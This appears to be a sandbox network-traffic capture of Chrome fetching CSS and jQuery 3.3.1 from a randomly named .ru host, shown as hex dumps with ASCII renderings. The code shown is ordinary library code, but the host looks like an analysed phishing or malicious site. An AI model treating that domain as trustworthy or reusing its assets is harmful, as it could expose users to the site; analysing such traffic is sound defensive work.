                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:14 UTC731INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:14 GMT
                                                                                                                                                                                    Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vk3W%2Bf1TlxTqurCSnizgeqY2wCM7OyDd5buh6f5Fqx6BsxmXNz%2BhjYFZ3PsoYtuRvNeF%2BGa1O50fJiJQ1VOt2Xc1WYfV5KThsrZtwg7sv9ssKWxrqIIdbNR06A09wNvq7QRS4R%2B27Fq0g7BngRkJKUpdrec%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d93296eada0-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:14 UTC638INData Raw: 37 39 38 31 0d 0a 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                                                    Data Ascii: 7981html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-blo
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f
                                                                                                                                                                                    Data Ascii: ertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;fo
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d
                                                                                                                                                                                    Data Ascii: ox-sizing:border-box}:before,:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webkit-
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 36 36 36 7d 61 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 7d 61 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74
                                                                                                                                                                                    Data Ascii: tion:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.t
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65
                                                                                                                                                                                    Data Ascii: {white-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.te
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 61 78 6c 69 6e 65 73 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d
                                                                                                                                                                                    Data Ascii: axlines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e
                                                                                                                                                                                    Data Ascii: te-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 65 69 67 68 74 3a 34 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77
                                                                                                                                                                                    Data Ascii: eight:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69
                                                                                                                                                                                    Data Ascii: splay:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-ri
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63
                                                                                                                                                                                    Data Ascii: .col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.c


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    63192.168.2.1649812104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:14 UTC706OUTGET /VyRsmGftiIlOxrabXBIOtQtS/67csesv4NT/7LYfTUz8QHbjxIA HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:14 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:14 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DOfdkKbKlN1mxoiG%2Bbua1QfxGf%2Fy4xPj7ytOgbkLJalFVlZ5WW9xcMsDNL%2BxVpeQKs5U%2F2cteJ0kMIvQ%2BVLxFCNR5mSN2O0D1yDmiygLaBjMAN1FQGKfk510Z5wUGG%2FAsbKsjC6iEJY0v4XUm1BJY%2FtjeGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d932a4144de-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:14 UTC625INData Raw: 37 63 63 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                                                                                                                                                    Data Ascii: 7cc7/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 3d 3d 3d 74 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62
                                                                                                                                                                                    Data Ascii: n e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"ob
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 29 29 66 6f 72 28 74 20 69 6e 20 65 29 6e 3d 61 5b 74 5d 2c 61 21 3d 3d 28 72 3d 65 5b 74 5d 29 26 26 28 6c 26 26 72 26 26 28 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 7c 7c 28 69 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 29 29 3f 28 69 3f 28 69 3d 21 31 2c 6f 3d 6e 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 5d 29 3a 6f 3d 6e 26 26 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 6e 29 3f 6e 3a 7b 7d 2c 61 5b 74 5d 3d 77 2e 65 78 74 65 6e 64 28 6c 2c 6f 2c 72 29 29 3a 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 61 5b 74 5d 3d 72 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 77 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 22 33 2e 33 2e 31 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e
                                                                                                                                                                                    Data Ascii: ))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 75 70 70 6f 72 74 3a 68 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 77 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 77 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 3d 21 21 65 26 26 22 6c 65 6e 67 74 68 22
                                                                                                                                                                                    Data Ascii: upport:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 78 70 28 22 5e 5c 5c 2e 28 22 2b 52 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 52 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4d 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4d 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4d 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4d 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c
                                                                                                                                                                                    Data Ascii: xp("^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 72 65 74 75 72 6e 20 72 3b 69 66 28 21 69 26 26 28 28 74 3f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 3a 77 29 21 3d 3d 64 26 26 70 28 74 29 2c 74 3d 74 7c 7c 64 2c 67 29 29 7b 69 66 28 31 31 21 3d 3d 54 26 26 28 66 3d 4a 2e 65 78 65 63 28 65 29 29 29 69 66 28 6f 3d 66 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 54 29 7b 69 66 28 21 28 6c 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 20 69 66 28 6d 26 26 28 6c 3d 6d 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 26 26 78 28 74 2c 6c 29 26 26 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 7b 69
